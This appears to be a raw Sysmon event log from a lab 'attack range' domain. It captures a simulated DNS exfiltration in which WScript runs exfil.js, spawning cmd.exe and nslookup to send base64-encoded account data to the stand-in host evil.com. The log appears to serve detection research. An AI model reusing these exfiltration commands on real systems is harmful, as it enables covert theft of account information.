14:21:55.141{2E1864BB-1903-629A-C646-000000005F02}56204660C:\Windows\system32\cmd.exe{2E1864BB-1903-629A-C846-000000005F02}7920C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.152{2E1864BB-1903-629A-C846-000000005F02}7920C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1903-629A-C646-000000005F02}5620C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlocd.tmp 2>&1 10341000x8000000000000000216722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.108{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1903-629A-C746-000000005F02}336C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.108{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1903-629A-C746-000000005F02}336C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.088{2E1864BB-1903-629A-C746-000000005F02}3366656C:\Windows\system32\conhost.exe{2E1864BB-1903-629A-C646-000000005F02}5620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000216719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.683{00000000-0000-0000-0000-000000000000}5860evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.601{00000000-0000-0000-0000-000000000000}8104evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.459{00000000-0000-0000-0000-000000000000}7608evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.360{00000000-0000-0000-0000-000000000000}7548evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.279{00000000-0000-0000-0000-000000000000}644evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.195{00000000-0000-0000-0000-000000000000}7316evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.117{00000000-0000-0000-0000-000000000000}6168evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000216712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.057{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-C746-000000005F02}336C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.041{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.041{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.041{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.041{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.041{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-C646-000000005F02}5620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.041{2E1864BB-18E0-629A-6742-000000005F02}39768156C:\Windows\System32\WScript.exe{2E1864BB-1903-629A-C646-000000005F02}5620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.049{2E1864BB-1903-629A-C646-000000005F02}5620C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlocd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000216704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.360{00000000-0000-0000-0000-000000000000}6688<unknown process>-udptruefalse127.0.0.1-51388-false127.0.0.1-53domain 354300x8000000000000000216703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.359{00000000-0000-0000-0000-000000000000}6688<unknown process>-udpfalsefalse127.0.0.1-51387-false127.0.0.1-53domain 354300x8000000000000000216702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.256{00000000-0000-0000-0000-000000000000}4712<unknown process>-udpfalsefalse127.0.0.1-51386-false127.0.0.1-53domain 354300x8000000000000000216701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.256{00000000-0000-0000-0000-000000000000}4712<unknown process>-udptruefalse127.0.0.1-51386-false127.0.0.1-53domain 354300x8000000000000000216700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.256{00000000-0000-0000-0000-000000000000}4712<unknown process>-udpfalsefalse127.0.0.1-51385-false127.0.0.1-53domain 354300x8000000000000000216699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.256{00000000-0000-0000-0000-000000000000}4712<unknown process>-udptruefalse127.0.0.1-51385-false127.0.0.1-53domain 354300x8000000000000000216698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.255{00000000-0000-0000-0000-000000000000}4712<unknown process>-udpfalsefalse127.0.0.1-51384-false127.0.0.1-53domain 23542300x8000000000000000216697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.041{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmylbmq.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.255{00000000-0000-0000-0000-000000000000}4712<unknown process>-udptruefalse127.0.0.1-51384-false127.0.0.1-53domain 23542300x800000000000000044925Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:55.612{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F13D53DBF067E8B045CA1A03EF6E5702,SHA256=446A25974728D64B0E71B992A9B1CC443250A1446AA9C22EF48BDA3E7271B9F5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.989{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.989{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-0247-000000005F02}6856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.989{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.989{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.989{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.989{2E1864BB-18E0-629A-6742-000000005F02}39761692C:\Windows\System32\WScript.exe{2E1864BB-1904-629A-0247-000000005F02}6856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.991{2E1864BB-1904-629A-0247-000000005F02}6856C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkhf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.973{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnok.tmpMD5=7D9173BD0DB6CB1EF243CECFF708168B,SHA256=E1F06C46829F00B73E93E5CA6A77E87CA3F897BE9C930070FC4C0794E517005D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.942{2E1864BB-1904-629A-0047-000000005F02}25567732C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-0147-000000005F02}6116C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.927{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.927{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.927{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 